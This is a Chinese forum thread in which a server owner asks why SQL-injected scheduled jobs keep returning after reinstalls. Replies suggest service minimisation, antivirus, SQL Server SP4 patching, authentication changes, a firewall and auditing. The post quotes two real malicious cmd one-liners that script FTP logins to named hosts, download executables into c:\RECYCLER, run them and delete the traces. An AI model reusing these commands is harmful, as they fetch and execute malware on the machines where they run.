cmd /c echo open www.ahadsl.com>c:\RECYCLER\zy2.exe&echo zxj81311>>c:\RECYCLER\zy2.exe&echo 4417815>>c:\RECYCLER\zy2.exe&echo get 2.exe c:\RECYCLER\st2.exe>>c:\RECYCLER\zy2.exe&echo bye>>c:\RECYCLER\zy2.exe&ftp -s:c:\RECYCLER\zy2.exe&if EXIST c:\RECYCLER\st2.exe (start c:\RECYCLER\st2.exe)&del c:\RECYCLER\zy2.exe&exitcmd /c echo open 121.37.42.68>c:\RECYCLER\zy123.exe&echo 110>>c:\RECYCLER\zy123.exe&echo 110>>c:\RECYCLER\zy123.exe&echo get 123.exe c:\RECYCLER\st123.exe>>c:\RECYCLER\zy123.exe&echo bye>>c:\RECYCLER\zy123.exe&ftp -s:c:\RECYCLER\zy123.exe&if EXIST c:\RECYCLER\st123.exe (start c:\RECYCLER\st123.exe)&del c:\RECYCLER\zy123.exe&exit以上是SQL被注入的计划执行代码。我是新装的系统啊,完全格式化重新装的,每次装完要不了多久就会被注入这样的计划作业。用的是联想服务器R520 G6。装XP也会这样,但我装过的其它的电脑也没有见这样的情况啊,还有我自己的笔记本也不会啊,
网上找了一下说是密码太简单了,但我的电脑都没有设密码啊。大家有没有碰到过,是怎么解决的呢?
网上找了一下说是密码太简单了,但我的电脑都没有设密码啊。大家有没有碰到过,是怎么解决的呢?
装系统,选择功能,不要的不装,特别是那些网络服务功能如DNS等
装完系统装解压缩软件,再装杀软,我用毒霸,不用360,我最讨厌那个什么360.
然后再装MSSQL和其他需要的应用软件.
最好能装个硬件防火墙,这样能极大防止宵小作乱
1.能否关闭SQL Server的windows验证?仅用SQL Server验证.
2.服务器Windows update,防火墙开启,装杀毒软件(及时升级).
3.SQL Server相关的SP补丁要安装.如SQL2000的SP4.
4.SQL Server的审计(audit)功能,可跟踪记录设定变更的详细信息.
不是矛盾,我说的是我的个人电脑没有密码,服务器还是有密码的,SP4之类的补丁已经全打了windows防火墙没有开,我开启试试,希望这回能稳定了!